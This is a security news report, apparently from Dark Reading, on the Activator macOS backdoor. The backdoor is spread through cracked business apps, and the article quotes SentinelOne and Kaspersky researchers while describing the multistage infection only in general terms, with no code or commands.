Security researchers have sounded the alarm on a new cyberattack campaign using cracked copies of popular software products to distribute a backdoor to macOS users.
What makes the campaign different from numerous others that have employed a similar tactic - such as one reported just earlier this month involving Chinese websites - is its sheer scale and its novel, multistage payload delivery technique.
Also noteworthy is the threat actor's use of cracked macOS apps with titles that are of likely interest to business users, so organizations that don't restrict what users download can be at risk as well.
Kaspersky was the first to discover and report on the Activator macOS backdoor in January 2024.
The number of samples of the Activator backdoor that SentinelOne has observed is more than even the volume of macOS adware and bundleware loaders that are supported by large affiliate networks, Stokes says.
Many of the cracked apps have business-focused titles that could be of interest to individuals in workplace settings.
A sampling: Snag It, Nisus Writer Express, and Rhino-8, a surface modeling tool for engineering, architecture, automotive design, and other use cases.
Threat actors seeking to distribute malware via cracked apps typically embed the malicious code and backdoors within the app itself.
In the case of Activator, the attacker has employed a somewhat different strategy to deliver the backdoor.
Different Delivery Method Unlike many macOS malware threats, Activator doesn't actually infect the cracked software itself, Stokes says.
Users are instructed to copy both apps to the Applications folder, and run the Activator app.
The app then prompts the user for the admin password, which it then uses to disable macOS' Gatekeeper settings so that applications from outside Apple's official app store can now run on the device.
The malware then initiates a series of malicious actions that ultimately turn off the systems notifications setting and install a Launch Agent on the device, among other things.
The Activator backdoor itself is a first-stage installer and downloader for other malware.
Sergey Puzan, malware analyst at Kaspersky, points to another aspect of the Activator campaign that is noteworthy.
Puzan also believes that one potential goal of the threat actor behind this campaign is to build a macOS botnet.
Since Kaspersky's report on the Activator campaign, the company has not observed any additional activity, he adds.
This Cyber News was published on www.darkreading.com. Publication date: Fri, 02 Feb 2024 20:05:21 +0000